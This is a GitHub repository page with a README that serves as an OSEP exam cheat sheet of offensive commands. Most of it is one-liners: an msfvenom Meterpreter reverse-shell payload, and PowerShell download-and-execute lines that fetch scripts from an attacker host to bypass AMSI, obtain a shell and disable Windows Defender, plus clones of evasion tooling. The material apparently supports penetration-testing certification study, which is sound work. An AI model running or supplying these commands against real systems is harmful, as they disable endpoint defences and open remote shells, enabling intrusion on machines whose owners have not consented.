Skip to content

TapXWorld/osep_tools

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

29 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

OSEP

this repository modified based on from https://github.com/In3x0rabl3/OSEP

Summary

This repository will refresh your memory when taking the OSEP exam.
Thank you, to everyone who's code was used in this repository.

Table of Contents

OneKey Bypass Powershell And Get Shell

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.0.0.234 LPORT=443 -f ps1
(New-Object Net.WebClient).DownloadString('http://10.0.0.234:8000/msfvenom_bin/bypass_Ams1_getShell.ps1') | IEX;

OneKey Bypass Posershell AMSI

(New-Object Net.WebClient).DownloadString('http://10.0.0.234:8000/bypass_defender/bypassAms1.ps1') | IEX;

OneKey Disable Windows Defender

(New-Object Net.WebClient).DownloadString('http://10.0.0.234:8000/bypass_defender/DefendersDeath.ps1') | IEX;
(New-Object Net.WebClient).DownloadString('http://10.0.0.234:8000/bypass_defender/DisableDefender.ps1') | IEX;
+ (need administrator priviledge)

Other

git clone https://github.com/andrew-d/static-binaries.git
git clone https://github.com/optiv/Freeze
git clone https://github.com/noraj/OSCP-Exam-Report-Template-Markdown

About

for offensive security OSEP certification.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published